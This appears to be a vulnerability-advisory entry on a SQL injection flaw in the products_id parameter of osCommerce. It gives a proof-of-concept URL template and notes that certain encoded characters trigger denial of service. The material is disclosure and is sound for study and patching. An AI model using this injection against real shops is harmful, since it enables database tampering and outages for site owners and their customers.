• info
• discussion
• exploit
• solution
• references

osCommerce products_id URI Parameter SQL Injection Vulnerability

The following proof of concept has been supplied:

http://www.example.com/default.php?cPath=[MID]&sort=5a&page=1&action=buy_now&products_id=[PID][JNK]

[MID] = A Valid Manufacturer ID Number
[PID] = A Valid Product ID Number
[JNK] = SQL query or junk. %22 %5C %27 or %00 Will cause a DoS